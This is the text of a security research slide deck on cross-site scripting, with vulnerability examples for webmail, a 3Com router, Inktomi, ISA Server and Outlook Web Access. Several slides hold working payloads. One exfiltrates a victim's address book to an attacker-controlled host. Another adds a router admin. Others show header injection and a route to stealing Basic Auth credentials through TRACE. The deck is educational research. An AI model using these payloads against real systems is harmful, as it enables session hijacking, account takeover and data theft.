2. GUIDELINE
Guideline
Introduction
XSS Today
Let’s see some XSS
Infohacking Research 2 Not O
3. Introduction
What’s this?
XSS?
How it works?
Where it works?
Application level security.
OK, but it’s only a XSS.
Infohacking Research 3 Not O
4. XSS
XSS (common attacks)
When somebody can exploit user inputs to get a non expected
response.
The error it’s usually due to a poor filtering on user inputs and/or
on the output from dynamically generated pages.
This could allow access to something restricted to user, for
example: session credentials (cookies, session Id’s, etc.)
Infohacking Research 4 Not O
5. How it works
How it work’s
Attacker must trick the victim to make a special HTTP request.
Usually exploited on web environment:
1) Webmails
2) Web forums
3) Any web application (dynamic content) that allows user interaction
Other applications that render some output in HTML (log viewers, mail
clients)“HTML inyection”. (like ILLC techniques)
Exploits a non secure programming methodology.
The attacker usually wants the victim to do something:
Sends out some cookie (session or permanent)
Make an HTTP request for you ;)
The goal of XSS: We are on the victim environment.
Infohacking Research 5 Not O
6. How it works
How it works, example
We found a flaw on a server (ex: online bank with email service)
Construct a special request to explot this flaw (XSS), and obtain
user credentials.
Send a message to the victim (with window.open, img src, etc.)
Wait for the user access and get the session track cookie.
Access to the online bank with user credentials (stolen cookie)
Now we are this user for a few time.
Infohacking Research 6 Not O
7. Where it works
Where it Works?
Any dynamic generated content dependant on user’s input it’s a
potential XSS security hole.
Enter your name: Toni
Hi Toni
Simple example of explotation on a dynamic page:
Enter your name: Toni<script>alert(‘Hello XSS’)</script>
Hi Toni
Infohacking Research 7 Not O
8. Application level security
Nowadays, the application level security is one of the
computer challenges.
Application level firewalls like HIVE or layer 7 filters.
Client side security it’s out of control for webmasters.
Servers can only do their best trying to filter any data coming
from client side.
Fact: most of the XSS based attacks and vulnerabilities are easy
to exploit.
No special skills are needed -> script kiddies.
XSS is useful to impersonate a user but doesn’t provide a
direct or easy way of controlling a computer…umm, well, you
still can do lot of things ;-)
Infohacking Research 8 Not O
9. OK, but it’s only a XSS.
OK, but it’s only a XSS…
Yes, XSS attacks seem to be harmless by itself, but they could open
other attack vectors.
We can gain access to a web-admin tool.
(IIS 6.0 Web Admin XSS vulnerability)
XSS, breaks with old HTTP session tracking methods: use of ID’s on
the URL, cookies and also source IP based authentication.
(Iplanet Messaging Server XSS vulnerability)
Combination of XSS with other flaws to launch a more complex
attack:
-HOTMAIL XSS and AV bypass
-Microsoft User Domain Credendials access via OWA XSS (via XST)
Infohacking Research 9 Not O
10. XSS Today
XSS today
XSS, next generation attacks.
Proof of concept: HTTP redirection
XSS based worms & trojans
XSS worm
XSS trojan
Anyone could be affected by XSS
Infohacking Research 10 Not O
11. XSS Next Generation
XSS next generation attacks.
HTTP response redirection (information leak)
(Zeus Web Admin XSS)
HTTP bouncing (Full interactive)
… under construction
Infohacking Research 11 Not O
12. HTTP Redirection
Proof of concept: HTTP redirection
Example of an evil link that steals address book of the victim ‘s webmail:
http://<target>/vulnerable.cgi?variable=<script>function%20pedo(){var
%20xmlHttp%20=%20new
%20ActiveXObject("Microsoft.XMLHTTP");xmlHttp.open("GET","http://<t
arget>/address_book.cgi",false);xmlHttp.send();xmlDoc=xmlHttp.respons
eText;window.open(“http://www.infohacking.com/data_collector.php?
response=“+xmlDoc);} pedo();</script>
Infohacking Research 12 Not O
13. HTTP Redirection
Which means:
http://<target>/vulnerable.cgi?variable= (server path to script inyection)
<script>
function pedo()
{var xmlHttp = new ActiveXObject("Microsoft.XMLHTTP");
xmlHttp.open("GET","http://<target>/address_book.cgi",false); // MAKE REQUEST
xmlHttp.send();
xmlDoc=xmlHttp.responseText; // STORE RESPONSE
window.open(“http://<attacker_site>/“+xmlDoc);} // SEND RESPONSE TO ATTACKER
pedo();
</script>
Note: we use “window.open” to send response in order to bypass “xmlHttp.open”
security restrictions.
Infohacking Research 13 Not O
14. XSS based worms & trojans
General “features”
Spreading trough webmail servers
Self decrypting script routine
Can modify permanent cookies (trojan)
Can force session logout (D.o.S.)
Can impersonate the user
Can steal information (mail content, address book, etc)
Hard to be detected by AV software (encrypted payload)
If no user action is needed (as XSS on some field of the mail)
then the spreading will be very fast!
Infohacking Research 14 Not O
15. XSS worm
How it works:
Once executed, the script will self decrypt and try to detect the
source (Hotmail, Yahoo, Terra, …) or the webmail software
(Iplanet, etc). It can be done with a simple “document.URL”, and
comparing with some patterns.
If the source is known try to get address book
Filter only webmail addresses
Auto send routine
Infohacking Research 15 Not O
16. XSS trojan
How it works:
Once executed, the script will self decrypt and try to set a
permanent cookie (will be stored on victim’s hard disk)
The modified cookie could change some option: it can set
Chinese language as default ;-) (D.o.S.)
The modified cookie could redirect the victim to some place on
the server that is controlled by the attacker (changing some
profile setting in the cookie)
As worms, trojan could try to spread away…
Infohacking Research 16 Not O
17. Anyone can be affected by XSS
Recent example: ViewCVS.py
Affected sites: Sorceforge.net, Apache.org, Iptables.org.
Those sites are well known to everybody, are probably they are
managed by security concerned people…
… anyway, they still can be exposed to XSS risks…
Infohacking Research 17 Not O
21. XSS Examples
Some XSS examples from Infohacking Research
3Com 812 ADSL router -> we add a new admin
Inktomi Traffic Server -> all user vulnerables by this XSS
Iplanet Messaging Server -> session hijack
Microsoft ISA Server ->
OWA XSS -> Access to user credentials
Infohacking Research 21 Not O
22. XSS on 3com ADSL router
There is a lot of XSS present on the OCR812
http://<ip_of_OCR812>/<script>document.write("<b>WE_CAN_I
NJECT_CODE</b>")</script>
Infohacking Research 22 Not O
23. XSS on 3com ADSL router
With XSS we can insert new users to our router
We can use windows.open, or <img src=..> to make our special
request
/
Forms/admin_telnet_add"+String.fromCharCode(63)+"uumUserN
ame=infohacking&uumUserPassword=
Infohacking Research 23 Not O
24. XSS on 3com ADSL router
We can make the complete process if we know IP, user and
password (by example, old admin)
<html>
<img src="<ip_or_name_of_OCR812>/legalizacion_marihuana.jpg">
<script type="text/javascript">
var xmlHttp = new ActiveXObject("Microsoft.XMLHTTP")
xmlHttp.open("GET", "<YOUR_FUCKING_REQUEST>,false)
xmlHttp.setRequestHeader("Authorization:", "Basic
User:Password(base64 encoded)")
xmlHttp.send()
</script>
</html>
Infohacking Research 24 Not O
25. Inktomi Traffic Server XSS
Inktomi Traffic Server is a proxy cache used on several
countryes by ISP
Also know in Spain as “Proxy cache de Telefónica”
A special request by a client passing through the Inktomi Traffic-
Server causes an error page generated by the proxy. This
dynamic error page is vulnerable to Cross Site Scripting...
Indirectly any server whose clients come trough the Traffic-
Server and using cookies to track sessions are "vulnerable".
The client making the request IS UNABLE to distinguish what
domain generated this code...
Infohacking Research 25 Not O
26. Inktomi Traffic Server XSS
Exploit?
We test it over 5.5.1 version.
Only need configure a proxy on ANY IP with port 80.
Make a special request.
http://<spoofed_domain>:443/</em><script>alert()</script>
We can see the script executed on our browser, “generated” by
the spoofed domain. Now, we can access to cookies, and
everything, like man in the middle attack.
Infohacking Research 26 Not O
27. Iplanet messaging server XSS
This webmail, Iplanet messaging server allow us hijack
the SID.
This server allows "online" opening of file attachments. This
means that any html file will be opened by the client browser in
the IPlanet webmail domain context. Wonderful XSS ;-)
Now we can explode this XSS with a html
attach.
With document.URL we obtain the SID and userid (located on the
URL)
With the SID, we gain access to all attach.
http://<iplanet_host>/attach/file.html?
sid=XYXYXYXYXYXYXY&mbox=INBOX&uid=XXXXX
&number=2&filename=file.html
Infohacking Research 27 Not O
28. Iplanet messaging server XSS
But this is not easy…. Iplanet webmail include a IP
session tracking.
When we can use the hijacked SID?
If we are near the victim, behind a NAT device, we can access
with his SID.
We can stole the session to all people who access trough a
transparent proxy (like transparent proxy devices).
Or we can create a script to force user make request and redirect
to us. Of course… they don’t see anything… (see above)
Note: a lot of web server use the same session-cookie on both http and
https domains. (This note is for the online bank developers).
Infohacking Research 28 Not O
29. Microsoft ISA Server XSS
This example shows an XSS exploited using headers
When we try to go an unreachable url trought ISA Server. ISA
generate an error page, showing some data (the content of “via
header”).
We fix this header.
Now we can request a non-existent URL into an existent domain.
(usually server use the same cookie on all his domain)
Steal cookies
Access.
We don’t need a flaw on the server code. Use ISA Server
instead.
Infohacking Research 29 Not O
30. ISA Server Exploit
<html>
<body>
<script type="text/javascript">
alert("Click OK then wait for a few seconds...")
var xmlHttp = new ActiveXObject("Microsoft.XMLHTTP")
xmlHttp.open("GET", "http://www.infohacking.com:113", false)
xmlHttp.setRequestHeader("Via",
"CODE_INJECTED_IN_VIA_HEADER<script>alert
("ISA_SERVER_XSS_by_INFOHACKING")</script>")
xmlHttp.send()
xmlDoc=xmlHttp.responseText
document.write(xmlHttp.responseText)
</script>
</body>
</html>
Infohacking Research 30 Not O
31. OWA XSS
What we have here?
With OWA you can see an HTML formatted e-mail
A user must click on a special link for this purpose in the webmail
interface, and an alert will pop-up.
To avoid people executing malicious content in the client
browser, the OWA will try to filter the content of the mail.
Good, but… no
enough.
Infohacking Research 31 Not O
32. Disabling OWA filtering
The URL to view an HTML formatted mail is something like this:
http://<IP_or_name_of_the_server>/exchange/<username>/<inbox_name>/<su
bject>.EML/1_multipart/2_text.htm?Security=1
Good name for a parameter, other name maybe “change_this_for_fucking_us”
We only need to quit this parameter, and OWA don’t apply the filter.
Infohacking Research 32 Not O
33. OWA XSS
Obtaining data to create our special link.
We need IP or hostname of the server, user name and subject.
All this we can found on the “referer” header of an HTTP request
coming from a link in the body of message.
<img src="http://<site_of_the_attacker">
Now with referrer, we can send our attack.
We have the IP or hostname of server (from referrer)
We have the user name (from referer)
We know the subject
We create a link in the body of message, without the
“security” parameter. (link to the same message without
security parameter)
Infohacking Research 33 Not O
34. OWA, Stolen credentials
Nothing else?
OWA uses cookies to track the HTTP session, but also uses
"Basic Auth" for... more security? ;-)
This “Basic Auth” (-> base64 encoded user:passwd) contains the
user credentials for this domain.
To access the "Basic Auth" header, the easiest way is via an http
"TRACE" request...and the IIS (Internet Information Server) by
default will allow those kind of requests.
Infohacking Research 34 Not O
35. XSS
That’s all folks??
Of course, as always, imagination of the attacker is the only limit...
much more fun is possible.
Thanks For Your attention.
Infohacking Research 35 Not O